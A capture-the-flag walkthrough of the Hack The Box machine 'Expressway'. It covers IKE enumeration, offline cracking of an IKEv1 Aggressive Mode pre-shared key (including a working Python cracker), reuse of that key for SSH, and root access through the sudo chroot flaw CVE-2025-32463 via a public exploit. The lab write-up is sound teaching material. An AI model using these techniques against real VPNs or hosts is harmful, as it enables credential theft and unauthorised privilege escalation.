HTB Expressway Writeup

Sep 26, 2025 • hackthebox, walkthrough, writeup

Nmap

A full TCP port scan was run first:

nmap -sC -sV -p- expressway.htb -oA expressway-fulltcp

Key results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian-8

No web ports were open. The machine's hint, "Interstate 500", suggested checking UDP port 500 (CTF boxes sometimes hide the entry point this way), so a targeted UDP scan of 500 and the IKE NAT-traversal port 4500 was run:

sudo nmap -sU -p 500,4500 -Pn -T4 expressway.htb -oN udp-scan

Open ports:

PORT     STATE         SERVICE
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

This indicated an IKE responder (an IPsec VPN endpoint) on the target. 4500/udp is IKE NAT traversal; nmap reports it open|filtered because the probe drew no reply, which for UDP is indistinguishable from a filtered port.


ike-scan Enumeration

ike-scan was used to fingerprint the service; -A requests an IKEv1 Aggressive Mode exchange instead of the default Main Mode:

sudo ike-scan -A expressway.htb

Output:

10.129.144.254  Aggressive Mode Handshake returned
 HDR=(CKY-R=929b4a50d302886c)
 SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
 KeyExchange(128 bytes) Nonce(32 bytes)
 ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
 VID=09002689dfd6b712 (XAUTH)
 VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
 Hash(20 bytes)

Key finding: the Aggressive Mode handshake leaked the responder identity ike@expressway.htb. This is the known weakness of IKEv1 Aggressive Mode with PSK authentication: the responder sends its ID and HASH_R in the clear before any encryption is negotiated, and HASH_R is derived only from the PSK and values already on the wire (nonces, Diffie-Hellman public values, cookies, SA and ID payload bodies). A single captured exchange is therefore enough for an offline dictionary attack on the PSK. The vendor ID payloads additionally show XAUTH and Dead Peer Detection support.


PSK Cracking

The exchange was repeated with -P, which makes ike-scan write the values psk-crack needs (DH public values, cookies, SA and ID payload bodies, nonces and HASH_R) in psk-crack's input format:

sudo ike-scan -A -P expressway.htb > psk.txt

psk-crack was run with the rockyou wordlist:

sudo gunzip -k /usr/share/wordlists/rockyou.txt.gz
sudo psk-crack -d /usr/share/wordlists/rockyou.txt psk.txt

Output:

key "freakingrockstarontheroad" matches SHA1 hash ...

Pre-shared key:

freakingrockstarontheroad
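
Why one Aggressive Mode exchange is enough to run the attack offline, as an added example that is neither the writeup's code nor psk-crack itself: the script below computes HASH_R from a psk-crack style parameter line for each candidate key using the RFC 2409 SHA1/PSK construction, and builds a constructed handshake line protected by the cracked key so that it runs without a capture. The nine-field order, the payload sizes and the ID_USER_FQDN body layout are assumptions chosen to match ike-scan's -P output and the sizes shown in the scan above; only the PSK is taken from the page, and the wordlist is a three-entry stand-in for rockyou.

```python
#!/usr/bin/env python3
"""Offline dictionary attack on an IKEv1 Aggressive Mode PSK hash.

Added example for this writeup; not psk-crack and not code from the box.
It reimplements the SHA1/PSK case of RFC 2409 section 5.1, which is what
psk-crack evaluates for every candidate key:

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

Every input except the PSK crosses the wire unencrypted in Aggressive
Mode. Input lines follow the format ike-scan writes with -P (assumed):
nine colon-separated hex fields, g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r.
The handshake values produced by synthetic_psk_line() are constructed, not captured.
"""
import hashlib
import hmac
from typing import Iterable, Optional

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def hash_r(psk: bytes, p: dict, prf: str = "sha1") -> bytes:
    """HASH_R as the responder computes it (RFC 2409 5.1, PSK authentication)."""
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], prf).digest()
    msg = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, msg, prf).digest()


def parse_psk_line(line: str) -> dict:
    """Parse one psk-crack style line into raw bytes per field."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def crack(line: str, candidates: Iterable[str], prf: str = "sha1") -> Optional[str]:
    """Return the first candidate whose HASH_R matches the captured one, or None."""
    p = parse_psk_line(line)
    target = p["hash_r"]
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        if hmac.compare_digest(hash_r(cand.encode(), p, prf), target):
            return cand
    return None


def _fill(tag: str, n: int) -> bytes:
    """Deterministic filler standing in for captured bytes (constructed data)."""
    return hashlib.shake_256(tag.encode()).digest(n)


def synthetic_psk_line(psk: str, responder_id: str = "ike@expressway.htb") -> str:
    """Build a psk-crack style line for a made-up exchange protected by `psk`.

    Sizes mirror the ike-scan output in the writeup: 128-byte DH public
    values (group 2, modp1024), 8-byte cookies, 32-byte nonces. The ID body
    is an ID_USER_FQDN payload body: type 3, protocol 0, port 0, then the name.
    """
    p = {
        "g_xr": _fill("g_xr", 128),
        "g_xi": _fill("g_xi", 128),
        "cky_r": _fill("cky_r", 8),
        "cky_i": _fill("cky_i", 8),
        "sai_b": _fill("sai_b", 48),  # SA payload body; its content does not matter here
        "idir_b": bytes([3, 0, 0, 0]) + responder_id.encode(),
        "ni_b": _fill("ni_b", 32),
        "nr_b": _fill("nr_b", 32),
    }
    p["hash_r"] = hash_r(psk.encode(), p)
    return ":".join(p[name].hex() for name in FIELDS)


if __name__ == "__main__":
    line = synthetic_psk_line("freakingrockstarontheroad")
    wordlist = ["password", "123456", "freakingrockstarontheroad"]  # stand-in for rockyou
    print("recovered PSK:", crack(line, wordlist))
```

To reproduce psk-crack -d against a real capture, pass the line from psk.txt and an open wordlist file (open("rockyou.txt", errors="ignore")) to crack(); a proposal that negotiated MD5 instead of SHA1 needs prf="md5".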

SSH Access

The local part of the leaked identity, ike, was tried as an SSH username with the cracked PSK as the password; the credential had been reused:

ssh ike@expressway.htb
ike@expressway.htb's password: freakingrockstarontheroad
Linux expressway 6.16.7-1 #1 SMP Debian
Last login: Fri Sep 26 00:28:12 2025 from 10.10.15.9
ike@expressway:~$

The user flag was read from /home/ike/user.txt:

ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
84f2d8...

Privilege Escalation

linpeas flagged the installed sudo version (sudo -V reports it directly):

Sudo version 1.9.17

CVE-2025-32463 covers this version. It is the sudo chroot ("chwoot") local privilege escalation in sudo 1.9.14 through 1.9.17, fixed in 1.9.17p1: the -R/--chroot option lets any local user make sudo chroot into a user-controlled directory while it resolves the target command, and NSS lookups made inside that chroot honour an attacker-written /etc/nsswitch.conf, which can load an attacker-supplied shared object as root. The public exploit repository was used: https://github.com/KaiHT-Ladiant/CVE-2025-32463
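
Before pulling an exploit onto a box it is worth confirming the version actually sits in the affected window, since 1.9.17 and 1.9.17p1 differ only in the patch level. The check below is an added example, not code from the writeup or from the exploit repository; it parses the banner line that sudo -V prints and compares a (major, minor, patch, p-level) tuple against the 1.9.14 to 1.9.17p1 range. The sample banner strings are constructed.

```python
#!/usr/bin/env python3
"""Check whether an installed sudo is in the CVE-2025-32463 affected range.

Added example, not from the writeup or the exploit repository. Affected
releases are 1.9.14 through 1.9.17 inclusive; 1.9.17p1 contains the fix.
Comparing (major, minor, patch, plevel) tuples makes "1.9.17" sort before
"1.9.17p1" and keeps "1.9.14p3" inside the range. Sample banners below are
constructed to look like the first line of `sudo -V` output.
"""
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]

AFFECTED_FROM: Version = (1, 9, 14, 0)  # first affected release
FIXED_IN: Version = (1, 9, 17, 1)       # 1.9.17p1

_VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.MULTILINE)


def parse_sudo_version(text: str) -> Optional[Version]:
    """Extract the version tuple from `sudo -V` output; None if no banner line."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def chwoot_affected(sudo_v_output: str) -> bool:
    """True when the version falls inside [1.9.14, 1.9.17p1)."""
    v = parse_sudo_version(sudo_v_output)
    if v is None:
        raise ValueError("no 'Sudo version' line found")
    return AFFECTED_FROM <= v < FIXED_IN


def local_sudo_output() -> str:
    """Run `sudo -V`; the version banner needs no privileges."""
    return subprocess.run(["sudo", "-V"], capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    # Constructed samples on both sides of the fixed release.
    for banner in ("Sudo version 1.9.17", "Sudo version 1.9.17p1", "Sudo version 1.9.13p3"):
        print(f"{banner!r}: affected={chwoot_affected(banner)}")
    try:
        print("local sudo affected:", chwoot_affected(local_sudo_output()))
    except (FileNotFoundError, ValueError) as exc:
        print("local sudo not checked:", exc)
```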

Exploit workflow on the box (the repository's script was pasted into /tmp/exploit.sh with nano):

ike@expressway:/tmp$ nano exploit.sh
ike@expressway:/tmp$ chmod +x exploit.sh
ike@expressway:/tmp$ ./exploit.sh
[*] Exploiting CVE-2025-32463...
[*] Attempting privilege escalation...
root@expressway:/# ls
bin   home            lib64       opt   sbin  usr
boot  initrd.img      lost+found  proc  srv   var
dev   initrd.img.old  media       root  sys   vmlinuz
etc   lib             mnt         run   tmp   vmlinuz.old
root@expressway:/# cd root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
7a0b35...

A root shell was obtained and the root flag read from /root/root.txt.


Summary

  • Enumerated UDP/500 → IKE Aggressive Mode.
  • Leaked identity: ike@expressway.htb.
  • Cracked PSK with rockyou → freakingrockstarontheroad.
  • SSH as ike, retrieved user flag.
  • Privilege escalation via sudo 1.9.17 (CVE-2025-32463) → root.

Expressway chained an IKEv1 configuration weakness (Aggressive Mode with a dictionary PSK) and password reuse with a recent sudo exploit.
